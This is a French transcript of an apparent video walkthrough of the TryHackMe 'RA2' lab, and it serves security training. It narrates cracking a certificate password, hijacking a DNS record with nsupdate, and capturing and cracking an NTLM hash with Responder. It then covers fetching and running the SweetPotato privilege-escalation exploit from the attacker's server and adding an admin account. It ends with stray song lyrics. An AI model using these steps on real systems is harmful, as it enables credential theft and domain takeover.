Bonjour et bienvenue à tous sur cette nouvelle vidéo CTF sur la plateforme TryHackMe. On est sur le CTF RA2, donc qui est la suite du CTF RA qu'on a fait il n'y a pas si longtemps, il y a 2-3 vidéos je crois. C'est un CTF en difficulté hard, donc encore une fois un CTF que j'ai déjà fait. Alors l'énoncé, lorsqu'ils pensaient que leur hash était safe, RA2 The Sequel. Ok. Histoire. WineCorp a récemment eu une security breach, une faille de sécurité. Depuis cela, ils ont endurci leur infrastructure et ils ont appris de leurs erreurs. Mais peut-être pas assez. Vous avez réussi à pénétrer dans leur réseau local. Bon hacking, créé par Katren blablabla, TIRT42, ok. Donc j'ai déjà démarré la machine, enfin, ça fait un petit moment entre temps, le temps qu'elle démarre, je vais aller faire d'autres choses. Pour être sûr qu'elle démarre bien. Du coup il y a 3 flags à récupérer. Donc c'est parti, on va mettre ça sur le côté. Je vais créer, alors normalement j'ai créé un dossier RA2, voilà. Un dossier RA2, je suis déjà connecté au VPN. Comme d'habitude, scan nmap, donc nmap, l'adresse IP, alors l'adresse IP c'était 10.10.35.128. Un scan agressif, -p- pour scanner tous les ports, on nmap results.txt pour stocker tout ça dans un fichier texte, pour sauvegarder les résultats du scan, et -d pour activer le mode debug, pour pouvoir voir en temps réel les ports qui sont découverts. Alors, 443, donc il y a un site web sur le port 443 je pense, normalement 443 c'est pour ça, c'est pour le HTTPS. 53, il y a le service DNS, 445 et 139, le service SMB, 135, je sais plus ce que c'est, mince. 80, il y a un site web sur le port 80 probablement. Pas mal de ports ouverts ici, je sais pas trop à quoi ils correspondent. Est-ce qu'on a le port 5985 qui est ouvert ou pas? Bon, on va pas attendre plus longtemps. On va commencer direct par énumérer le site web. Donc GoBuster dir-u http 10.10.35.128/w/usr share wordlist, et on va utiliser la wordlist comme d'hab, directory list 2.3 medium. Je vais enregistrer ça dans un fichier .txt. Alors qu'est-ce qu'ils nous disent? Non-existing URL. Attendez, on va aller voir manuellement. Sur ce port s'il n'y a pas 10.10.35.128. Ah mince, refusé par le proxy, oui. Essayer. Ah ok. On est redirigé vers fire.winecorp.thm. Donc on a un nom de domaine et un sous-domaine. Un sous-domaine ou une virtual host, je sais pas. On verra après. Et donc sur le port 443 on est redirigé. Bon du coup, ce que je vais faire c'est que je vais ajouter ça dans le fichier hosts 10.10.35.128. Et donc on a le domaine winecorp.thm et le sous-domaine fire.winecorp.thm. Je pense que c'est un sous-domaine puisque à mon avis si on fait une requête au service DNS, on verra l'enregistrement DNS fire.winecorp.thm. Donc à mon avis c'est vraiment un sous-domaine. Du coup on va réessayer, je vais juste changer l'URL du coup. https fire.winecorp.thm. Et je vais rajouter l'option -k pour ignorer que le certificat est auto-signé ou ce genre de choses, pour pas avoir de problème. Par rapport au certificat, bon ça c'est classique, IMG, Vendor, ça on l'avait déjà vu la dernière fois. Pendant que le scan tourne, on va aller voir à la main, essayer. Alors juste voir dans le certificat s'il n'y a pas... Ah vous voyez, c'est toujours bien de regarder dans les certificats parce qu'on peut voir d'autres sous-domaines ici. On a le sous-domaine self-service.winecorp.thm et le sous-domaine self-service.dev.winecorp.thm. On va renseigner ces deux sous-domaines ici dans notre fichier host et on verra après si on trouve des choses dessus. Je vais accepter. Visiblement c'est le même site que la dernière fois. Là on a un bouton self-service qui doit nous rediriger vers self-service. Voilà c'est ça. Nous ne parvenons pas, oui parce que je ne l'ai pas ajouté encore dans mon fichier host. Bon ça c'est des faux positifs, on s'en fout. Ok, sudo nano /etc /host. Du coup on a ça. Je l'avais mal copié, c'est pas grave. Self service.dev, non, d'abord .winecorp.thm et self service.dev.winecorp.thm. Enregistré, ça fait beaucoup. Ok, donc maintenant si j'essaye d'y aller, on est redirigé encore une fois ici. Je vais voir le certificat s'il n'y a pas encore d'autres choses. Non, visiblement. Alors on va accepter. Ah, on nous demande un nom d'utilisateur et un mot de passe. Bon, on pourrait essayer admin, ça marche pas. Je pense qu'il va falloir qu'on trouve d'une manière ou d'une autre au moins un nom d'utilisateur minimum.
Parce que là, brute force et nom d'utilisateur et mot de passe, ça risque d'être très long et mener à rien peut-être. On va aller voir sur... Attendez, je vais retourner là. On va aller voir sur selfservice.dev.wincore.thm. Avancer. Alors maintenant, je regarde tout le temps les certificats depuis que j'ai fait un CTF... qui consistait à énumérer des sous-domaines. Je me suis rendu compte que regarder les certificats, vous voyez, ça peut être très intéressant. Sinon, on n'aurait peut-être pas trouvé ça. Donc je vais accepter. En construction, work in progress. Alors le truc, c'est que souvent, en tout cas dans les CTF que j'ai fait, les sites, les applications web ou autres qui étaient en développement, on pouvait souvent trouver des informations sensibles dedans, que ce soit du code source, d'identifiant ou autre. Tiens, je vais inspecter le code source. Est-ce qu'on a quelque chose? Non. Console, est-ce qu'on a quelque chose dans la console? Non. Debugger. Rien d'intéressant. Est-ce qu'on a un cookie qui a été créé? Non plus. Bon. Ici, on trouve rien. Visiblement, on trouve rien. On a des faux positifs. Ah! PowerShell. /PowerShell. Tiens, tiens. Et ça nous redirige vers PowerShell Default ASPX. Ah. On va aller voir ça. On va aller voir ça de suite. fire.wincore.thm /PowerShell. Ok, on est redirigé ici. Windows PowerShell Web Access. Windows Server 2016. Alors déjà, on a une info ici sur la version de la machine, du serveur. Il tourne sur Windows Server 2016. Ça pourra peut-être nous servir pour l'élévation de privilèges, cette information. Windows PowerShell Web Access. Entrez vos identifiants pour vous connecter. Donc là, il nous demande nom d'utilisateur, mot de passe, type de connexion. Alors là, je ne saurais pas trop dire à quoi ça sert cette option-là. Le nom de l'ordinateur. Ok. Et les options avancées, il y a quoi? Ok, les identifiants de l'ordinateur de destination. Microsoft PowerShell. Type d'authentification. Ok, Kerberos, etc. SSL. 5985. Donc visiblement le port 5985 serait ouvert. Peut-être. Puisqu'il est renseigné ici. Par défaut. On verra après. Bon, pour l'instant, pareil, là on n'a pas d'identifiant, on peut rien en faire. Peut-être que si on trouve des identifiants pour la page de tout à l'heure, ils serviront ici aussi. Je sais pas. On va garder ça de côté. Bon, là on trouve d'autres faux positifs. Sur le scan and map, est-ce qu'on a trouvé d'autres choses, d'autres ports ouverts? Open port, et ça fait, il y a beaucoup de ports qui ont été découverts. Visiblement, il n'y a pas le port 5985 ici. Peut-être que je suis aveugle. Il doit être accessible que depuis l'application web, peut-être. C'est possible. Il n'est pas ouvert publiquement, on va dire. Enfin, pas accessible depuis notre machine directement. On va voir, je vais lancer un scan GoBuster, pareil, le même scan GoBuster, sur la partie self-service.dev, pour voir si on peut pas trouver des fichiers. HTTP. Alors c'était HTTPS, il me semble, self-service.dev.windcorp.thm/. La wordlist, on va utiliser la même. Hein. J'espère juste que la machine va pas trop galérer du fait qu'on lance deux scans GoBuster en même temps. Je vais enregistrer ça aussi dans un autre fichier. Tiens, self-service.dev.txt. URL note 7. Mince, j'ai oublié le -u. -u. Pardon, j'ai oublié le -k aussi. Voilà, pour ignorer le fait que le certificat est auto-signé. Je crois que c'est pour ça qu'il nous met cette erreur. Ah! Dans self-service.dev.wincore.thm, on a trouvé un répertoire backup. On va aller voir ce qu'il y a dedans. Alors je vais retourner voilà, /backup. On a un certificat, pfx et webconfig. Alors webconfig d'abord, on n'y a pas accès. Je voulais voir ça directement parce que ce genre de fichier ça peut être lisible directement. Le certificat pfx, ça nous le télécharge. Oui, voilà, c'est ça, ça le télécharge. On a un certificat. Alors de souvenir, dans ce CTF, il me semble qu'on peut s'en servir justement de ce certificat, qu'on doit s'en servir à un moment. On verra après. Je pense pas qu'on ait d'autres choses à trouver, on verra après. Il nous reste à énumérer le service DNS et le service SMB aussi, qu'on n'a pas énuméré. Alors attendez, hop, on va, voilà. Je vais revenir en haut du résultat du scan. Donc le port 53, ça c'est pour le service DNS, HTTP. Bon là vous voyez ici aussi il nous a énuméré les domaines et sous-domaines. Nmap est capable de le faire tout seul. Mais c'est bien aussi de savoir le faire à la main. Service LDAP, il y a beaucoup de choses ouvertes. Computer name Fire. Ça, on pourra peut-être, enfin justement ça doit être le nom de l'ordi dont on doit prendre le contrôle depuis la console PowerShell qui est accessible sur le site web. Donc on retient le nom de l'ordi Fire. Alors, est-ce qu'on trouve d'autres choses ici? Non. Ici, est-ce qu'on trouve d'autres choses? Toujours pas. Je vais énumérer le service DNS. Alors pour ça, je vais faire dig arrobase. Donc l'adresse IP du serveur DNS qu'on veut interroger. Donc dans notre cas, c'est la machine cible puisqu'elle a le service DNS installé.
on va lui demander des enregistrements DNS concernant le domaine windcorp.thm et on va demander toutes les entrées. Ah, et on a un flag. On a un flag. Alors, je vais pas le flouter dans la vidéo, celui-là, parce que visiblement, il nous donne une information. Alors, permettre des mises à jour dynamiques non sécurisées est une vulnérabilité significative, car ces mises à jour peuvent être acceptées de sources inconnues, enfin de sources malveillantes. Donc visiblement, là, ce qu'ils nous disent, et c'est bien ce qui me semblait, on peut dynamiquement modifier les enregistrements DNS. Donc on peut modifier les enregistrements DNS. Et avec le certificat qu'on a chopé tout à l'heure, on pourra se faire passer justement pour fire.windcorp.thm, j'imagine. Ou self-service peut-être, je sais pas. Je vais copier ça, on va le renseigner sur TryHackMe. Hop, on a le premier flag. Donc visiblement, on a la possibilité du coup... alors ça par contre je sais pas comment le vérifier si le flag nous l'avait pas dit, mais visiblement on peut modifier les enregistrements DNS. Alors comment on pourrait faire ça? On pourrait faire ça avec NSUpdate. Là il faut préciser le serveur, DNS, donc on fait serveur et donc l'adresse IP du serveur DNS en question qui est la machine cible. Ensuite, ah sinon non, on va se faire passer pour, on va essayer de se faire passer pour self-service. Attendez, au pire, on a moyen de voir le certificat, quoi il correspond. Le certificat qu'on a chopé. Je fais un clear ici. Parce qu'on a... Ah oui, le certificat, je vais le déplacer, pardon. Ok, là on a le certificat. Est-ce qu'on a moyen de savoir à quel sous-domaine ou domaine il appartient? Ah mince, il nous demande un mot de passe. Il nous demande un mot de passe pour importer le certificat. Enfin moi je voulais pas l'importer, je voulais juste voir des informations. Mais visiblement il est protégé par un mot de passe, donc on va essayer de le craquer. Avec John. Donc pour ça on va faire alors /opt John run. Du coup c'est pfx to John, c'est ça. Et on va lui préciser donc le fichier pfx et on va rediriger le hash qui est généré vers le fichier h.txt. Donc si je fais cat h.txt, oula, ouais, on a un hash ici qui a été généré. Et maintenant on va essayer de le craquer pour choper le mot de passe du coup du certificat. Donc on va faire /opt John run John h.txt et on précise une word list /usr share word list /rockyou.txt et on a bien chopé le mot de passe, on a réussi à craquer le hash. Donc on a le mot de passe du certificat. Je vais le noter quelque part. Alors echo cert-pass.txt, voilà. Au cas où, pour pas l'oublier. Du coup, je vais réessayer de faire ce que j'ai fait juste avant. Je vais juste faire CTRL-SHIFT, c'est plus rapide. Ok. Et là, ça, alors, du coup, on voit à quel sous-domaine ça appartient. Fire.windcorp.thm. On a la clé privée, le certificat en lui-même. Ok. Ok. On va les enregistrer dans un fichier séparément, la clé et le certificat. Alors, on peut le faire avec une commande directement, mais bon, je me rappelle plus de la syntaxe, alors je vais le faire à la main. Cert.key, donc ça c'est la clé, voilà. Et pareil avec le certificat, je vais copier nano cert.crt, voilà. Et là on a le certificat. Donc on a le certificat et la clé séparés en deux fichiers ici. Alors est-ce que, alors là on a un scan GoBuster qui est bientôt terminé, mais je pense pas qu'il va trouver d'autres choses. Donc il faut qu'on essaie de modifier l'enregistrement de fire.windcorp.thm pour se faire passer. En fait, pour que quand certaines personnes vont accéder à fire.windcorp.thm, il faut qu'elles soient redirigées vers notre adresse IP, en fait, et pas l'adresse IP de la machine cible. En fait, on va littéralement être des imposteurs. On va imposter, je sais pas si ça se dit, le sous-domaine fire.windcorp.thm. Alors par contre, la syntaxe, je me rappelle plus. Alors on va regarder. Je vais regarder ça sur internet. Et je vous mettrai le lien en description évidemment, hein, des docs que j'utilise. Alors on fait update, delete. On va supprimer l'enregistrement fire.windcorp.thm, celui-là je pense. Fire.windcorp.thm. Send. Refused. Ah. Send. Refused. Pourquoi refused? Alors ça doit être l'enregistrement self-service .windcorp.thm peut-être. Send. Alors on a bien pu le supprimer, maintenant je vais faire update, add self-service, on va rajouter du coup cet enregistrement DNS.thm
on va le rajouter. La valeur qui est après, je ne sais pas à quoi elle correspond honnêtement. Alors je vais prendre exemple là-dessus. Alors là, il faudra vérifier. Hein. Par contre, à quoi ça correspond cette valeur, je ne me rappelle plus. A, c'est un enregistrement de type A. Et l'adresse IP du coup vers laquelle on veut que les gens soient redirigés quand ils vont là-dessus. Donc c'est la nôtre, 10.14.32.60. Send, update failed, YXRRSET. Ok, j'ai supprimé tous les enregistrements concernant self-service.winecorp.thm. Non, si je fais update, j'ai peut-être fait une erreur. Update add self service, de toute façon on pourra le remodifier après. winecorp.thm à 10.14.32.60. Send. Ok, ok, ça me paraît bon. Clear. Et si je réessaye? Ok, et là maintenant, voilà. Si on demande au serveur DNS, en service DNS plutôt, ça fait pas que serveur DNS, mais si on lui demande à quelle adresse IP correspond ce sous-domaine, il correspond à mon adresse IP. Ça veut dire que dès qu'un utilisateur ira sur ce sous-domaine, il sera redirigé vers mon adresse IP. Et donc là, comme en plus j'ai le certificat concernant ce sous-domaine-là, je pourrais me faire passer pour ça, pour ce sous-domaine, et je pourrais intercepter peut-être quelque chose d'intéressant. Donc on va utiliser Responder pour ça. Alors d'abord il faut qu'on y mette le certificat et la clé qu'on a. Donc je vais faire cp cert.crt. On va copier le certificat dans /opt responder et certs. Voilà, c'est là. Et on va sudo. Voilà, je déplace le certificat, je vais déplacer la clé aussi. Et donc là on a un certificat et une clé par défaut pour l'outil Responder, qu'on a déjà utilisé dans une vidéo d'ailleurs, cet outil. Pas pour la même utilisation, mais on s'en est déjà servi. Bah justement dans le CTF-RA. Mais ce qu'on va faire, c'est qu'on va du coup déplacer ça, je vais l'appeler. Je vais faire mv responder.crt. Je vais déplacer ça vers responder.crt.back. Toujours pareil, j'oublie sudo. On va faire pareil pour la clé, responder.key. Et on va le renommer responder.key.back. Voilà, donc maintenant on a les deux fichiers backup. J'ai fait des backups des deux fichiers originaux. Et je vais juste renommer cela responder.crt et responder.key. Voilà. Du coup maintenant ce qu'on va faire c'est qu'on va exécuter responder. Donc responder.py, j'ai créé un alias. Alors déjà il faut exécuter avec sudo responder.py -i majuscule pour préciser sur quelle interface on veut l'exécuter. Donc c'est l'interface tune0 pour le VPN de TryHackMe. Et c'est tout normalement. Là il me demande mon mot de passe. Et il m'a pas demandé... Oups. Pardon. Il m'a demandé la clé mais il m'a pas laissé la rentrer, c'est bizarre ça. Alors peut-être que comme j'ai déjà fait le CTF, il a peut-être gardé en mémoire, je sais pas. Bizarre. Il me demande la passphrase, mais de suite après, je la rentre quand même. Bon, peut-être que j'ai tapé dans le vide, je sais pas, c'est bizarre. On va attendre de voir si on reçoit quelque chose. Ah! Je m'apprêtais à chercher sur internet pour voir s'il n'y avait pas un problème. Visiblement, on a... Alors, normalement, il demande la passphrase, il faut la rentrer. Moi, il m'a pas laissé la rentrer, ça doit être parce que je l'ai déjà fait, le CTF. Ça a dû être gardé en mémoire quelque part. Mais, du coup, là, on a le hash de Edwardle, je sais pas comment on dit, bref. Donc, on a le hash NTLM, qui est en fait le hash du mot de passe de l'utilisateur Edwardle. Donc si on craque ce hash, on aura le mot de passe de cet utilisateur là et on pourra s'en servir pour se connecter probablement sur dans le répertoire PowerShell qu'on avait trouvé avec GoBuster. Je vais copier ça dans un fichier hash.txt, nano hash-edwardle.txt. Je colle le hash et on va essayer de le craquer avec John. John run John hash-edwardle.txt. Et on utilise toujours la même wordlist. On va voir si on arrive à craquer son hash ou pas. Et on a réussi à craquer son hash. Donc on a son mot de passe. On va le copier. Faut pas oublier qu'on n'a pas énuméré le service SMB. Alors ce sera peut-être pas nécessaire, mais il faut le garder en mémoire. Alors du coup on va retourner sur self-service.winecorp.thm. On demande un mot de passe. Et un utilisateur, je tape Edwardle.
Et le mot de passe, est-ce que ça fonctionne et ça nous redirige ici. Alors je vais plutôt aller vers fire.wincore.thm/PowerShell. Voilà. Username Edwardle. Le mot de passe et le nom de l'ordinateur, on l'a vu tout à l'heure avec le scan and map, c'est Fire. Sign in. Est-ce que ça fonctionne? Et on est connecté en tant qu'Edwardle. Ok, on est dans ces documents et là on a un terminal PowerShell depuis le site web. Si je tape ls par exemple, submit. Voilà, les commandes sont bien exécutées. Je vais faire whoami /groups. Déjà, on commence déjà à énumérer /group sans s. Non, c'est avec s, à chaque fois je me trompe. Alors, est-ce qu'on appartient à un groupe particulier? Alors, users, ok, account operators, comme la dernière fois, je crois, dans le CTF RA. On faisait aussi partie de ce groupe. Donc, on peut modifier des noms d'utilisateurs. Modifier des comptes, pardon, donc des mots de passe de certains utilisateurs. Alors attendez, déjà on va récupérer le flag. Normalement il y a le flag pour cet utilisateur ls. Alors il doit être dans son bureau. Voilà, il y a le flag. Alors cat flag2.txt. Hop, on va copier le flag. Je vais faire un petit clear. On va renseigner le flag sur TryHackMe. Hop. Et maintenant il nous manque le flag admin. Alors comme on a... On va revérifier quand même, hein. Whoami /groups. Mais si on fait partie de ce groupe, ça veut peut-être dire que si on a des droits admin, et qu'en plus on fait partie du groupe Account Operators, est-ce qu'on pourrait pas créer un utilisateur admin directement? On va essayer. Net user, cybereta, password, oups. Password 1, 2, 3, point d'exclamation, /add. On a bien créé un utilisateur cybereta. Et maintenant si je fais net group, non local group, administrators cybereta /add, access is denied, mince. Alors je suis tombé sur ce site qui répertorie les différentes variantes de l'exploit print spoofer. À la base c'était, je crois, l'exploit d'origine. Bref, et du coup on a hot potato, rotten potato, lonely potato, juicy potato, on a plein d'exploits. Et il me semble, je suis quasi certain que, vous voyez, whoami /priv avec un s, c'est ça. Non, sans s à chaque fois je me trompe. Je suis quasi sûr que ce droit là qu'on a, impersonate privilege, je suis sûr que ce droit là on peut s'en servir pour élever nos privilèges grâce à un de ces exploits, mais je ne sais plus lequel. Et il me semble, après quelques recherches, alors j'en ai essayé qui marchait pas, il me semble que c'est sweet potato. Alors est-ce qu'ils expliquent comment ils font? Alors ils expliquent pas comment fonctionne cet exploit, ils expliquent pas comment il fonctionne. On va chercher ailleurs. Est-ce qu'ici ils expliquent comment il fonctionne? Écoutez, on va essayer cet exploit. Alors par contre pour le compiler, ça va être compliqué. Je vais voir s'il n'y a pas un sweetpotato.exe. Je vais essayer de télécharger directement le .exe si je le trouve. Ah voilà, j'ai trouvé un download, alors je vais copier le lien. Copier l'adresse du lien. Je vous le mettrai en description, je mettrai ce lien plutôt en description carrément. De sweetpotato. Voilà. Donc clear. Donc on va faire déjà je vais le télécharger sur ma VM. Donc déjà je vais le télécharger sur ma VM wget. Hop, voilà. Donc là j'ai sweetpotato.exe. Je vais ouvrir un serveur web. Je vais ici. Allez, on va y arriver. Je vais télécharger wget http://10.14.32.62.84. Ah, je sais pas, j'ai ce bug. C'était sweetpotato.exe-out file. Je vais l'appeler juste exploit.exe, ce sera plus simple. Donc là on a l'exploit ici, sweetpotato.exe. Et donc si je regarde comment il marche, alors si j'essaie d'exécuter -a cmd, oups je me suis fail, cmd a, et si je fais whoami ne fonctionne pas, cancel, j'ai tout cassé. Alors le problème c'est que quand j'exécute ça, peut-être si je fais PowerShell plutôt, en fait là je peux plus rien taper, c'est ça le problème. J'ai encore une autre idée.
ce serait de créer directement un nouvel utilisateur exploit.exe-a. Je crois qu'il faut mettre entre guillemets net user, non net group, local group administrators, et on va s'ajouter sibereta /add, on va s'ajouter, ok, on s'est ajouté normalement au groupe administrator. Si je fais net user sibereta, on est bien administrateur, on s'est bien ajouté en tant qu'administrateur. Maintenant, si je fais exit, page, et là on va essayer de se connecter en tant que le nouvel utilisateur que j'ai créé, sibereta. Password, 3 points d'exclamation, j'avais mis, le nom de l'ordi c'est Fire. J'ai du mal à taper le mot de passe. Ah, vérifiez que vous êtes autorisé. Ou je vais essayer en bureau à distance, puisque là je suis admin. xfreeRDP /v 2.10.10.35.128 u sibereta /p 2. Password 1, 2, 3 points d'exclamation. Et normalement, comme mon utilisateur fait partie du groupe administrator, je peux me connecter en bureau à distance. Ok, ça c'est cool. J'en ai mis du temps là, j'ai bloqué pendant un moment hein, pour l'élévation de privilèges. Je vous dis, j'ai vraiment du mal sur les CTF sous Windows. Donc là, normalement, on est admin. Comme on fait partie du groupe admin, on a les droits administrateurs, donc normalement on peut aller directement récupérer le flag. Je suis dans C, user, administrator, continue. Voilà, on est dans le dossier d'utilisateur administrator. Desktop, et on a le troisième flag, et si on essaie de l'ouvrir, on a bien le troisième flag. Je vais le copier. Hop, on va le coller ici. Je l'ai mal... Voilà, submit. Et on a terminé ce CTF, enfin. Bon, il était difficile aussi, c'est peut-être normal que j'ai galéré en fait. Je sais pas. Mais bon, en tout cas, j'ai vraiment eu du mal pour l'élévation de privilèges. Ouais, j'ai vraiment eu du mal pour l'élévation de privilèges. Faudrait que je m'entraîne peut-être plus sur des machines sur Windows. En tout cas, voilà, on a réussi ce CTF. Donc voilà. Bon, là, après, le principe global restait le même, trouver un moyen de créer un utilisateur admin, de créer un utilisateur et de l'ajouter au groupe admin, donc voilà. Et ensuite se connecter en bureau à distance. C'est ce qu'on avait fait aussi dans le CTF RA, il me semble, mais on l'avait fait en exploitant un script. C'était ça, en exploitant un script PowerShell qui s'exécutait automatiquement en boucle. Mais bref. Bon, c'était cool ce CTF, c'était vraiment pas facile l'élévation de privilèges. Comme d'hab, alors faudra que je fasse le compte rendu écrit. Normalement à l'heure où sort la vidéo il sera en description, si c'est pas le cas il le sera bientôt. Vous aurez le lien en description, pareil vous aurez le lien de la room. Après c'est une room premium celle-là. Voilà, c'est une room premium, donc si vous n'avez pas le premium vous n'aurez pas accès à cette room. Mais voilà. Donc vous aurez comme d'hab, comme je l'ai dit, le compte rendu écrit en description, le lien de la room, vous aurez le sommaire, le lien des docs et exploits, etc. que j'ai utilisé dans la vidéo et des outils. Vous aurez tout en description. J'espère que ça vous aura plu. N'hésitez pas à lâcher un like si vous avez aimé, à vous abonner si vous voulez voir les prochaines vidéos qui sortiront, et aussi à donner votre avis en commentaire. Ça me ferait super plaisir. Et moi je vous dis à la prochaine. I'm taking 6 shots, yeah, straight to the face. And I wanna get lost, I'm sick of this place. Don't know how to stop when I'm feeling this way. So I'm taking